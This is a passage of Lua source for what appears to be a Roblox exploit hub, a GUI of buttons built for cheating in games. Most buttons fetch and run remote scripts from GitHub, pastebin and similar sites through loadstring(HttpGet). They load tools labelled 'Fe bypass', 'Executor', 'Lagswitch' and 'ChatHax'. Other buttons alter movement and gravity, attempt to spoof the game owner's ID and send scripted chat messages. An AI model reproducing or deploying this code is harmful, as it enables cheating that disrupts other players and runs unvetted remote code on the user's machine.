loadstring(game:HttpGet(('https://raw.githubusercontent.com/h17s3/TIGERADMIN/main/TIGERADMINSCRIPTFREE'),true))() end) button_25.Name = "button" button_25.Parent = ipg2 button_25.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_25.BorderColor3 = Color3.fromRGB(255, 0, 0) button_25.BorderSizePixel = 3 button_25.Position = UDim2.new(0.513698757, 0, 0.427631587, 0) button_25.Size = UDim2.new(0, 73, 0, 25) button_25.Font = Enum.Font.SourceSans button_25.Text = "ChatHax" button_25.TextColor3 = Color3.fromRGB(255, 255, 255) button_25.TextSize = 14.000 button_25.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/fakechat"))() end) button_26.Name = "button" button_26.Parent = ipg2 button_26.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_26.BorderColor3 = Color3.fromRGB(255, 0, 0) button_26.BorderSizePixel = 3 button_26.Position = UDim2.new(0, 0, 0.427631587, 0) button_26.Size = UDim2.new(0, 71, 0, 25) button_26.Font = Enum.Font.SourceSans button_26.Text = "SystemBroken" button_26.TextColor3 = Color3.fromRGB(255, 255, 255) button_26.TextSize = 14.000 button_26.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/H20CalibreYT/SystemBroken/main/script"))() end) button_27.Name = "button" button_27.Parent = ipg2 button_27.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_27.BorderColor3 = Color3.fromRGB(255, 0, 0) button_27.BorderSizePixel = 3 button_27.Position = UDim2.new(0.513698757, 0, 0.592105269, 0) button_27.Size = UDim2.new(0, 73, 0, 25) button_27.Font = Enum.Font.SourceSans button_27.Text = "Ice Hub" button_27.TextColor3 = Color3.fromRGB(255, 255, 255) button_27.TextSize = 14.000 button_27.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/IceMael7/NewIceHub/main/Brookhaven"))() end) button_28.Name = "button" button_28.Parent = ipg2 button_28.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_28.BorderColor3 = Color3.fromRGB(255, 0, 0) button_28.BorderSizePixel = 3 button_28.Position = UDim2.new(0.51399982, 0, 0.674421012, 0) button_28.Size = UDim2.new(0, 72, 0, 25) button_28.Font = Enum.Font.SourceSans button_28.Text = "Prison Life Gui" button_28.TextColor3 = Color3.fromRGB(255, 255, 255) button_28.TextSize = 14.000 button_28.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/g00lXploiter/g00lXploiter/main/Fe%20bypass"))() end) button_29.Name = "button" button_29.Parent = ipg2 button_29.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_29.BorderColor3 = Color3.fromRGB(255, 0, 0) button_29.BorderSizePixel = 3 button_29.Position = UDim2.new(0, 0, 0.592105269, 0) button_29.Size = UDim2.new(0, 71, 0, 25) button_29.Font = Enum.Font.SourceSans button_29.Text = "Energize FE" button_29.TextColor3 = Color3.fromRGB(255, 255, 255) button_29.TextSize = 14.000 button_29.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://gist.githubusercontent.com/jointeamck/7c4d164bd1a2726d5e352547c3f98052/raw/77332837d2d6669f50b191a5ecc90da7f6e6690e/Energize"))() end) button_30.Name = "button" button_30.Parent = ipg2 button_30.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_30.BorderColor3 = Color3.fromRGB(255, 0, 0) button_30.BorderSizePixel = 3 button_30.Position = UDim2.new(0.513999939, 0, 0.5099473, 0) button_30.Size = UDim2.new(0, 73, 0, 25) button_30.Font = Enum.Font.SourceSans button_30.Text = "c00lgui v1" button_30.TextColor3 = Color3.fromRGB(255, 255, 255) button_30.TextSize = 14.000 button_30.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://gist.githubusercontent.com/jointeamck/7c94c0b5cae4202a6be41ea24ce1bfe9/raw/867803a85aad7e30427a02cf19856061fa18cd78/oldest%2520version%2520of%2520c00lgui%2520revival"))() end) button_31.Name = "button" button_31.Parent = ipg2 button_31.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_31.BorderColor3 = Color3.fromRGB(255, 0, 0) button_31.BorderSizePixel = 3 button_31.Position = UDim2.new(0, 0, 0.5099473, 0) button_31.Size = UDim2.new(0, 71, 0, 25) button_31.Font = Enum.Font.SourceSans button_31.Text = "Executor" button_31.TextColor3 = Color3.fromRGB(255, 255, 255) button_31.TextSize = 14.000 button_31.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://gist.githubusercontent.com/jointeamck/c1c6ad86b743343aca463a0963c028a5/raw/cb40c5b77119cb52b60428dc3e112a4b479fc258/qipu's%2520Executor%2520(fixed)"))() end) button_32.Name = "button" button_32.Parent = ipg2 button_32.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_32.BorderColor3 = Color3.fromRGB(255, 0, 0) button_32.BorderSizePixel = 3 button_32.Position = UDim2.new(0, 0, 0.674421012, 0) button_32.Size = UDim2.new(0, 71, 0, 25) button_32.Font = Enum.Font.SourceSans button_32.Text = "SimpleSpy" button_32.TextColor3 = Color3.fromRGB(255, 255, 255) button_32.TextSize = 14.000 button_32.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua"))() end) pg2.Name = "pg2" pg2.Parent = CoolGui pg2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pg2.BorderColor3 = Color3.fromRGB(255, 0, 0) pg2.BorderSizePixel = 3 pg2.Position = UDim2.new(0, 0, 0.190000042, 0) pg2.Size = UDim2.new(0, 300, 0, 304) pg2.Visible = false ipg_2.Name = "ipg" ipg_2.Parent = pg2 ipg_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg_2.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg_2.BorderSizePixel = 3 ipg_2.Size = UDim2.new(0, 146, 0, 304) pgt_3.Name = "pgt" pgt_3.Parent = ipg_2 pgt_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt_3.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt_3.BorderSizePixel = 3 pgt_3.Size = UDim2.new(0, 146, 0, 30) pgt_3.Font = Enum.Font.SourceSansBold pgt_3.Text = "LocalPlayer" pgt_3.TextColor3 = Color3.fromRGB(255, 255, 255) pgt_3.TextSize = 14.000 pgt_3.TextWrapped = true button_33.Name = "button" button_33.Parent = ipg_2 button_33.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_33.BorderColor3 = Color3.fromRGB(255, 0, 0) button_33.BorderSizePixel = 3 button_33.Position = UDim2.new(0, 0, 0.0986842141, 0) button_33.Size = UDim2.new(0, 71, 0, 25) button_33.Font = Enum.Font.SourceSans button_33.Text = "Set Walkspeed" button_33.TextColor3 = Color3.fromRGB(255, 255, 255) button_33.TextSize = 14.000 button_33.MouseButton1Down:connect(function() game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = input.Text end) button_34.Name = "button" button_34.Parent = ipg_2 button_34.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_34.BorderColor3 = Color3.fromRGB(255, 0, 0) button_34.BorderSizePixel = 3 button_34.Position = UDim2.new(0.513698637, 0, 0.0986842141, 0) button_34.Size = UDim2.new(0, 71, 0, 25) button_34.Font = Enum.Font.SourceSans button_34.Text = "Heal" button_34.TextColor3 = Color3.fromRGB(255, 255, 255) button_34.TextSize = 14.000 button_34.MouseButton1Down:connect(function() game.Players.LocalPlayer.Character.Humanoid.Health = game.Players.Character.Humanoid.MaxHealth end) button_35.Name = "button" button_35.Parent = ipg_2 button_35.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_35.BorderColor3 = Color3.fromRGB(255, 0, 0) button_35.BorderSizePixel = 3 button_35.Position = UDim2.new(0.513999999, 0, 0.180999994, 0) button_35.Size = UDim2.new(0, 71, 0, 25) button_35.Font = Enum.Font.SourceSans button_35.Text = "Anti-Fling" button_35.TextColor3 = Color3.fromRGB(255, 255, 255) button_35.TextSize = 14.000 button_35.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/Q0Nh2SYx"))() end) button_36.Name = "button" button_36.Parent = ipg_2 button_36.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_36.BorderColor3 = Color3.fromRGB(255, 0, 0) button_36.BorderSizePixel = 3 button_36.Position = UDim2.new(0, 0, 0.180999994, 0) button_36.Size = UDim2.new(0, 71, 0, 25) button_36.Font = Enum.Font.SourceSans button_36.Text = "Floating Pad" button_36.TextColor3 = Color3.fromRGB(255, 255, 255) button_36.TextSize = 14.000 button_36.MouseButton1Down:connect(function() local name = game.Players.LocalPlayer.Name local p = Instance.new("Part") p.Parent = workspace p.Locked = true p.BrickColor = BrickColor.new("White") p.BrickColor = BrickColor.new(104) p.Size = Vector3.new(8, 1.2, 8) p.Anchored = true local m = Instance.new("CylinderMesh") m.Scale = Vector3.new(1, 0.5, 1) m.Parent = p while true do p.CFrame = CFrame.new(game.Players:findFirstChild(name).Character.Torso.CFrame.x, game.Players:findFirstChild(name).Character.Torso.CFrame.y - 4, game.Players:findFirstChild(name).Character.Torso.CFrame.z) wait() end end) button_37.Name = "button" button_37.Parent = ipg_2 button_37.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_37.BorderColor3 = Color3.fromRGB(255, 0, 0) button_37.BorderSizePixel = 3 button_37.Position = UDim2.new(0, 0, 0.263157904, 0) button_37.Size = UDim2.new(0, 71, 0, 25) button_37.Font = Enum.Font.SourceSans button_37.Text = "Set Gravity" button_37.TextColor3 = Color3.fromRGB(255, 255, 255) button_37.TextSize = 14.000 button_37.MouseButton1Down:connect(function() game.Workspace.Gravity = input_3.Text end) button_38.Name = "button" button_38.Parent = ipg_2 button_38.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_38.BorderColor3 = Color3.fromRGB(255, 0, 0) button_38.BorderSizePixel = 3 button_38.Position = UDim2.new(0.513698637, 0, 0.263157904, 0) button_38.Size = UDim2.new(0, 71, 0, 25) button_38.Font = Enum.Font.SourceSans button_38.Text = "Punch Tool" button_38.TextColor3 = Color3.fromRGB(255, 255, 255) button_38.TextSize = 14.000 button_38.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/punch",true))() end) button_39.Name = "button" button_39.Parent = ipg_2 button_39.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_39.BorderColor3 = Color3.fromRGB(255, 0, 0) button_39.BorderSizePixel = 3 button_39.Position = UDim2.new(0, 0, 0.345473647, 0) button_39.Size = UDim2.new(0, 71, 0, 25) button_39.Font = Enum.Font.SourceSans button_39.Text = "commit oof" button_39.TextColor3 = Color3.fromRGB(255, 255, 255) button_39.TextSize = 14.000 button_39.MouseButton1Down:connect(function() local A_1 = "ima do it" local A_2 = "All" local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) wait(1) local A_1 = "I'm going to commit oof." local A_2 = "All" local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) wait(1) local A_1 = "goodbye cruel world." local A_2 = "All" local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) wait(1) LocalPlayer = game:GetService("Players").LocalPlayer LocalPlayer.Character.Humanoid:MoveTo(LocalPlayer.Character.HumanoidRootPart.Position + LocalPlayer.Character.HumanoidRootPart.CFrame.lookVector * 10) LocalPlayer.Character.Humanoid.Jump = true wait(0.5) function Iterate(instance, func) for i, v in next, instance:GetChildren() do func(v) end end limbs = { ["Right Leg"] = true; ["Right Arm"] = true; ["Left Leg"] = true; ["Left Arm"] = true; } Iterate(LocalPlayer.Character, function(v) if v:IsA("BasePart") then local attachment = Instance.new("Attachment") attachment.Parent = v attachment.Name = (v.Name .. "[Attachment]") if limbs[v.Name] then attachment.Position = Vector3.new(0, v.Size.Y/2, 0) elseif v.Name == "Head" then attachment.Position = Vector3.new(0, -v.Size.Y/2, 0) attachment.Rotation = Vector3.new(0, 0, -90) end end end) local leftLegAttachment = Instance.new("Attachment") leftLegAttachment.Position = Vector3.new(-.5, -1, 0) leftLegAttachment.Rotation = Vector3.new(0, -90, 0) local rightLegAttachment = Instance.new("Attachment") rightLegAttachment.Position = Vector3.new(.5, -1, 0) rightLegAttachment.Rotation = Vector3.new(0, -90, 0) rightLegAttachment.Parent, leftLegAttachment.Parent = LocalPlayer.Character.Torso, LocalPlayer.Character.Torso jointAttachments = { ['Head'] = { ['Attachment0'] = LocalPlayer.Character.Torso['NeckAttachment']; ['Attachment1'] = LocalPlayer.Character.Head['Head[Attachment]']; }; ['Left Arm'] = { ['Attachment0'] = LocalPlayer.Character.Torso['LeftCollarAttachment']; ['Attachment1'] = LocalPlayer.Character['Left Arm']['Left Arm[Attachment]']; }; ['Right Arm'] = { ['Attachment0'] = LocalPlayer.Character.Torso['RightCollarAttachment']; ['Attachment1'] = LocalPlayer.Character['Right Arm']['Right Arm[Attachment]']; }; ['Left Leg'] = { ['Attachment0'] = leftLegAttachment; ['Attachment1'] = LocalPlayer.Character['Left Leg']['Left Leg[Attachment]']; }; ['Right Leg'] = { ['Attachment0'] = rightLegAttachment; ['Attachment1'] = LocalPlayer.Character['Right Leg']['Right Leg[Attachment]']; }; } LocalPlayer.Character.Humanoid.PlatformStand = true Iterate(LocalPlayer.Character, function(v) if v:IsA("BasePart") then if jointAttachments[v.Name] then local ballSocketJoint = Instance.new("BallSocketConstraint") ballSocketJoint.Parent = v ballSocketJoint.Radius = 0.15 ballSocketJoint.Attachment0, ballSocketJoint.Attachment1 = jointAttachments[v.Name]['Attachment0'], jointAttachments[v.Name]['Attachment1'] end end end) Iterate(LocalPlayer.Character.Torso, function(v) if v:IsA("Motor") then v:Remove() end end) game.Players.LocalPlayer.Character.Humanoid.Health = 0 end) ipg2_2.Name = "ipg2" ipg2_2.Parent = pg2 ipg2_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg2_2.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg2_2.BorderSizePixel = 3 ipg2_2.Position = UDim2.new(0.49666667, 0, 0, 0) ipg2_2.Size = UDim2.new(0, 150, 0, 304) pgt_4.Name = "pgt" pgt_4.Parent = ipg2_2 pgt_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt_4.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt_4.BorderSizePixel = 3 pgt_4.Size = UDim2.new(0, 150, 0, 30) pgt_4.Font = Enum.Font.SourceSansBold pgt_4.Text = "Misc." pgt_4.TextColor3 = Color3.fromRGB(255, 255, 255) pgt_4.TextSize = 14.000 pgt_4.TextWrapped = true button_40.Name = "button" button_40.Parent = ipg2_2 button_40.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_40.BorderColor3 = Color3.fromRGB(255, 0, 0) button_40.BorderSizePixel = 3 button_40.Position = UDim2.new(0, 0, 0.0986842141, 0) button_40.Size = UDim2.new(0, 71, 0, 25) button_40.Font = Enum.Font.SourceSans button_40.Text = "BTools" button_40.TextColor3 = Color3.fromRGB(255, 255, 255) button_40.TextSize = 14.000 button_40.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://cdn.wearedevs.net/scripts/BTools.txt"))() end) button_41.Name = "button" button_41.Parent = ipg2_2 button_41.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_41.BorderColor3 = Color3.fromRGB(255, 0, 0) button_41.BorderSizePixel = 3 button_41.Position = UDim2.new(0.513698757, 0, 0.0986842141, 0) button_41.Size = UDim2.new(0, 73, 0, 25) button_41.Font = Enum.Font.SourceSans button_41.Text = "Become Owner" button_41.TextColor3 = Color3.fromRGB(255, 255, 255) button_41.TextSize = 14.000 button_41.TextWrapped = true button_41.MouseButton1Down:connect(function() if game.CreatorType == Enum.CreatorType.User then game.Players.LocalPlayer.UserId = game.CreatorId end if game.CreatorType == Enum.CreatorType.Group then game.Players.LocalPlayer.UserId = game:GetService("GroupService"):GetGroupInfoAsync(game.CreatorId).Owner.Id end end) button_42.Name = "button" button_42.Parent = ipg2_2 button_42.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_42.BorderColor3 = Color3.fromRGB(255, 0, 0) button_42.BorderSizePixel = 3 button_42.Position = UDim2.new(0, 0, 0.180999994, 0) button_42.Size = UDim2.new(0, 71, 0, 25) button_42.Font = Enum.Font.SourceSans button_42.Text = "Ligma Logo" button_42.TextColor3 = Color3.fromRGB(255, 255, 255) button_42.TextSize = 14.000 button_42.MouseButton1Down:connect(function() game:GetObjects("rbxassetid://10808177630")[1].Parent = game.Players.LocalPlayer.PlayerGui end) button_43.Name = "button" button_43.Parent = ipg2_2 button_43.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_43.BorderColor3 = Color3.fromRGB(255, 0, 0) button_43.BorderSizePixel = 3 button_43.Position = UDim2.new(0.51399982, 0, 0.18099995, 0) button_43.Size = UDim2.new(0, 73, 0, 25) button_43.Font = Enum.Font.SourceSans button_43.Text = "Lagswitch" button_43.TextColor3 = Color3.fromRGB(255, 255, 255) button_43.TextSize = 14.000 button_43.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://paste.gg/p/anonymous/d3492bd620bd4c46b54680ac80b0fa0d/files/161ddd9c992c4ceba3c298458d45188a/raw", true))() end) button_44.Name = "button" button_44.Parent = ipg2_2 button_44.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_44.BorderColor3 = Color3.fromRGB(255, 0, 0) button_44.BorderSizePixel = 3 button_44.Position = UDim2.new(0.513698757, 0, 0.263157904, 0) button_44.Size = UDim2.new(0, 73, 0, 25) button_44.Font = Enum.Font.SourceSans button_44.Text = "Roblox 2016" button_44.TextColor3 = Color3.fromRGB(255, 255, 255) button_44.TextSize = 14.000 button_44.MouseButton1Down:connect(function() if not game:IsLoaded() then game.Loaded:Wait() end wait(0.1) --// variables/modules local CoreGui = game:GetService("CoreGui") local RobloxGui = CoreGui:FindFirstChild("RobloxGui") local UserInputService = game:GetService("UserInputService") local TopBar = game:GetService("CoreGui"):WaitForChild("TopBarApp"):WaitForChild("TopBarFrame") local ChatIcon = TopBar:WaitForChild("LeftFrame"):WaitForChild("ChatIcon"):WaitForChild("Background"):WaitForChild("Icon") local UIS = game:GetService("UserInputService") local function devprint(text) if config.dev then print(text) end end --// custom assets local getasset = getsynasset or getcustomasset makefolder("2016_storage") writefile("2016_storage/bc.png", game:HttpGet("https://raw.githubusercontent.com/specowos/lua-projects/main/project%202016%3A%20Remastered/images/icon_BC-16.png")) writefile("2016_storage/tbc.png", game:HttpGet("https://raw.githubusercontent.com/specowos/lua-projects/main/project%202016%3A%20Remastered/images/icon_TBC-16.png")) writefile("2016_storage/obc.png", game:HttpGet("https://raw.githubusercontent.com/specowos/lua-projects/main/project%202016%3A%20Remastered/images/icon_OBC-16.png")) local bc_storage = { getasset("2016_storage/bc.png"), getasset("2016_storage/obc.png"), getasset("2016_storage/tbc.png") } --// STYLE: TopBar.Transparency = 0.5 TopBar.BorderSizePixel = 0 TopBar.BackgroundColor3 = Color3.fromRGB(31, 31, 31) TopBar.LeftFrame.ChatIcon.Background.StateOverlay.Image = "" TopBar.LeftFrame.MenuIcon.Background.StateOverlay.Image = "" TopBar.LeftFrame.MenuIcon.Background.Image = "" TopBar.LeftFrame.ChatIcon.Background.Image = "" TopBar.LeftFrame.Position = UDim2.new(0, 0, 0, 2) TopBar.LeftFrame.Size = UDim2.new(0, 0, 0, 36) TopBar.LeftFrame.MenuIcon.Position = UDim2.new(0, 0, 0, 0) TopBar.LeftFrame.MenuIcon.Size = UDim2.new(0, 50, 0, 36) TopBar.LeftFrame.MenuIcon.Background.Icon.Position = UDim2.new(0, 25, 0, 12) TopBar.LeftFrame.MenuIcon.Background.Icon.Size = UDim2.new(0, 32, 0, 25) game.CoreGui:WaitForChild("ThemeProvider").LegacyCloseMenu.CloseMenuButton.Position = UDim2.new(0, -8, 0, 18) game.CoreGui:WaitForChild("ThemeProvider").LegacyCloseMenu.CloseMenuButton.Size = UDim2.new(0, 32, 0, 25) TopBar.LeftFrame.ChatIcon.Position = UDim2.new(0, 0, 0, 0) TopBar.LeftFrame.ChatIcon.Size = UDim2.new(0, 50, 0, 36) TopBar.LeftFrame.ChatIcon.Background.Icon.Position = UDim2.new(0, 14, 0, 13) TopBar.LeftFrame.ChatIcon.Background.Icon.Size = UDim2.new(0, 28, 0, 27) TopBar.LeftFrame.MenuIcon.Background.Icon.Image = "rbxasset://textures/ui/Menu/Hamburger.png" --// cursor local mouse = game:GetService("Players").LocalPlayer:GetMouse() mouse.Icon = 'rbxasset://textures/ArrowFarCursor.png' --// chat scripts game:GetService("RunService").Heartbeat:Connect(function() if game.Players.LocalPlayer.PlayerGui.Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.Frame.ChatBar:IsFocused() then game.Players.LocalPlayer.PlayerGui.Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.BackgroundTransparency = 0.1 end end) local function changechatico() if ChatIcon.Image == "rbxasset://textures/ui/TopBar/chatOff.png" then ChatIcon.Image = "rbxasset://textures/ui/Chat/Chat@2x.png" elseif ChatIcon.Image == "rbxasset://textures/ui/TopBar/chatOn.png" then ChatIcon.Image = "rbxasset://textures/ui/Chat/ChatDown@2x.png" end end for _,v in pairs(game:GetDescendants()) do if v:IsA("TextLabel") and v.Text == "Chat '/?' or '/help' for a list of chat commands." then v.Text = "Please chat '/?' for a list of commands" end end changechatico() spawn(function() game:GetService("Players").PlayerChatted:Connect(function(PlayerChatType, sender, message, recipient) changechatico() end) end) spawn(function() game:GetService("RunService").Heartbeat:Connect(function() changechatico() end) end) game.RunService.Heartbeat:Connect(function() TopBar.LeftFrame.MenuIcon.Background.StateOverlay.Image = "" game.CoreGui:WaitForChild("TopBarApp").LegacyCloseMenu.CloseMenuButton.Image = "rbxasset://textures/ui/Menu/HamburgerDown.png" game.CoreGui:WaitForChild("TopBarApp").LegacyCloseMenu.CloseMenuButton.ImageRectOffset = Vector2.new(0, 0) game.CoreGui:WaitForChild("TopBarApp").LegacyCloseMenu.CloseMenuButton.ImageRectSize = Vector2.new(0, 0) if TopBar.LeftFrame.ChatIcon:FindFirstChild("BadgeContainer") then if TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge") then TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Inner.Image = "rbxasset://textures/ui/Chat/MessageCounter.png" TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Inner.ImageRectOffset = Vector2.new(0, 0) TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Inner.ImageRectSize = Vector2.new(0, 0) TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Inner:ClearAllChildren() TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Position = UDim2.new(0, 15, 0, 2) TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Inner.ScaleType = Enum.ScaleType.Fit if TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge"):FindFirstChild("Background") then TopBar.LeftFrame.ChatIcon.BadgeContainer:FindFirstChild("Badge").Background:Destroy() end end end end) end) button_45.Name = "button" button_45.Parent = ipg2_2 button_45.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_45.BorderColor3 = Color3.fromRGB(255, 0, 0) button_45.BorderSizePixel = 3 button_45.Position = UDim2.new(0, 0, 0.263157904, 0) button_45.Size = UDim2.new(0, 71, 0, 25) button_45.Font = Enum.Font.SourceSans button_45.Text = "Turn R6" button_45.TextColor3 = Color3.fromRGB(255, 255, 255) button_45.TextSize = 14.000 button_45.MouseButton1Down:connect(function() local avs = game:GetService("AvatarEditorService") avs:PromptSaveAvatar(game.Players.LocalPlayer.Character.Humanoid.HumanoidDescription,Enum.HumanoidRigType.R6) local result = avs.PromptSaveAvatarCompleted:Wait() if result == Enum.AvatarPromptResult.Success then respawn() else end end) pg3.Name = "pg3" pg3.Parent = CoolGui pg3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pg3.BorderColor3 = Color3.fromRGB(255, 0, 0) pg3.BorderSizePixel = 3 pg3.Position = UDim2.new(0, 0, 0.190000042, 0) pg3.Size = UDim2.new(0, 300, 0, 304) pg3.Visible = false ipg_3.Name = "ipg" ipg_3.Parent = pg3 ipg_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg_3.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg_3.BorderSizePixel = 3 ipg_3.Size = UDim2.new(0, 146, 0, 304) pgt_5.Name = "pgt" pgt_5.Parent = ipg_3 pgt_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt_5.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt_5.BorderSizePixel = 3 pgt_5.Size = UDim2.new(0, 146, 0, 30) pgt_5.Font = Enum.Font.SourceSansBold pgt_5.Text = "Client Sided Scripts" pgt_5.TextColor3 = Color3.fromRGB(255, 255, 255) pgt_5.TextSize = 14.000 pgt_5.TextWrapped = true button_46.Name = "button" button_46.Parent = ipg_3 button_46.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_46.BorderColor3 = Color3.fromRGB(255, 0, 0) button_46.BorderSizePixel = 3 button_46.Position = UDim2.new(0, 0, 0.0986842141, 0) button_46.Size = UDim2.new(0, 71, 0, 25) button_46.Font = Enum.Font.SourceSans button_46.Text = "Set Platform" button_46.TextColor3 = Color3.fromRGB(255, 255, 255) button_46.TextSize = 14.000 button_46.MouseButton1Down:connect(function() local platform = Instance.new("Part") platform.Size = Vector3.new(16, 1, 16) platform.Transparency = 0.5 platform.Color = Color3.fromRGB(255, 0, 255) platform.Anchored = true platform.Parent = workspace local player_position = game.Players.LocalPlayer.Character.Head.Position platform.Position = Vector3.new(player_position.X, player_position.Y-5, player_position.Z) end) button_47.Name = "button" button_47.Parent = ipg_3 button_47.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_47.BorderColor3 = Color3.fromRGB(255, 0, 0) button_47.BorderSizePixel = 3 button_47.Position = UDim2.new(0.513698637, 0, 0.0986842141, 0) button_47.Size = UDim2.new(0, 71, 0, 25) button_47.Font = Enum.Font.SourceSans button_47.Text = "Disco Fog" button_47.TextColor3 = Color3.fromRGB(255, 255, 255) button_47.TextSize = 14.000 button_47.MouseButton1Down:connect(function() basics = {Color3.new(255/255,0/255,0/255),Color3.new(255/255,85/255,0/255),Color3.new(218/255,218/255,0/255),Color3.new(0/255,190/255,0/255),Color3.new(0/255,85/255,255/255),Color3.new(0/255,0/255,127/255),Color3.new(170/255,0/255,255/255),Color3.new(0/255,204/255,204/255),Color3.new(255/255,85/255,127/255),Color3.new(0/255,0/255,0/255),Color3.new(255/255,255/255,255/255)} game.Lighting.FogStart = 25 game.Lighting.FogEnd = 300 while true do wait(0.5) game.Lighting.FogColor = basics[math.random(1,#basics)] end end) button_48.Name = "button" button_48.Parent = ipg_3 button_48.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_48.BorderColor3 = Color3.fromRGB(255, 0, 0) button_48.BorderSizePixel = 3 button_48.Position = UDim2.new(0.513999999, 0, 0.180999994, 0) button_48.Size = UDim2.new(0, 71, 0, 25) button_48.Font = Enum.Font.SourceSans button_48.Text = "OG c00lgui" button_48.TextColor3 = Color3.fromRGB(255, 255, 255) button_48.TextSize = 14.000 button_48.MouseButton1Down:connect(function() loadstring(game:GetObjects("rbxassetid://11801763945")[1].Source)() end) button_49.Name = "button" button_49.Parent = ipg_3 button_49.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_49.BorderColor3 = Color3.fromRGB(255, 0, 0) button_49.BorderSizePixel = 3 button_49.Position = UDim2.new(0, 0, 0.180999994, 0) button_49.Size = UDim2.new(0, 71, 0, 25) button_49.Font = Enum.Font.SourceSans button_49.Text = "Ro-Xploit" button_49.TextColor3 = Color3.fromRGB(255, 255, 255) button_49.TextSize = 14.000 button_49.MouseButton1Down:connect(function() loadstring(game:GetObjects('rbxassetid://364364477')[1].Source)() end) button_50.Name = "button" button_50.Parent = ipg_3 button_50.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_50.BorderColor3 = Color3.fromRGB(255, 0, 0) button_50.BorderSizePixel = 3 button_50.Position = UDim2.new(0, 0, 0.263157904, 0) button_50.Size = UDim2.new(0, 71, 0, 25) button_50.Font = Enum.Font.SourceSans button_50.Text = "OG T0PK3K" button_50.TextColor3 = Color3.fromRGB(255, 255, 255) button_50.TextSize = 14.000 button_50.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/SXVJf1kk", true))() end) button_51.Name = "button" button_51.Parent = ipg_3 button_51.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_51.BorderColor3 = Color3.fromRGB(255, 0, 0) button_51.BorderSizePixel = 3 button_51.Position = UDim2.new(0.513698637, 0, 0.263157904, 0) button_51.Size = UDim2.new(0, 71, 0, 25) button_51.Font = Enum.Font.SourceSans button_51.Text = "Grab Knife" button_51.TextColor3 = Color3.fromRGB(255, 255, 255) button_51.TextSize = 14.000 button_51.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/XzBBWeXU", true))() end) button_52.Name = "button" button_52.Parent = ipg_3 button_52.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_52.BorderColor3 = Color3.fromRGB(255, 0, 0) button_52.BorderSizePixel = 3 button_52.Position = UDim2.new(0, 0, 0.345473647, 0) button_52.Size = UDim2.new(0, 71, 0, 25) button_52.Font = Enum.Font.SourceSans button_52.Text = "Infinite X (FE)" 